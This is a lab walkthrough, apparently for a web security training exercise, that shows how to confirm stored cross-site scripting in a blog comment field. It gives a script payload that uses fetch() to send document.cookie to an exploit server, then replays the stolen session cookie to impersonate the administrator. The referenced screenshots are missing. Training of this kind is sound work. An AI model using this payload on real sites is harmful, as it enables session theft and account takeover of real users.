Exploiting Cross-Site Scripting to Steal Cookies

Objective

PoC - Proving that the comment field vulnerable to XSS

  1. After your lab instance is loaded, go one of the blogposts.
  2. Inject a common XSS payload to the comment field like the following and click Post Comment. An alert should pop up.
  3. View the page source and observe that your input is reflected between the section tags.

This proves that the given lab instance is vulnerable to XSS injection!

So it is time to taking the next step which is exploiting the vulnerability. Basically, you can use the fetch API to cause a DNS resolving and sending a HTTP request to your exploit server(in this case burp collaborator) for the users who visits the blogpage.

Crafting the Payload

Template of the Payload

Final Payload
<script>
fetch('exploit_server_domain', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
})
</script>

4.Submit the above payload into the blog’s comment field.

Don’t forget to add prefix https:// before the burp colloborator subdomain.

If you view the page source it should look like this.

5.After posting the comment and your victim-user displays the blogpost immediately, you can go to the burp collaborator and press pull now for examining the received requests.

6.As a result, you successfully stole the session cookie for the victim-user(poor guy!). It is possible to use this session cookie in order to impersonating the victim-user. Following picture is a demonstration of the process and shows you how to do that: HTTP Header

GET \my-account?id=administrator

7.Follow the demonstration and in this case you will be pretending like you are the administrator, for that reason you will be receiving 200 OK response.

8.Click the show response in browser by right-clicking on the repeater tab, you will be landed to the administrator’s home page and the lab should have been solved.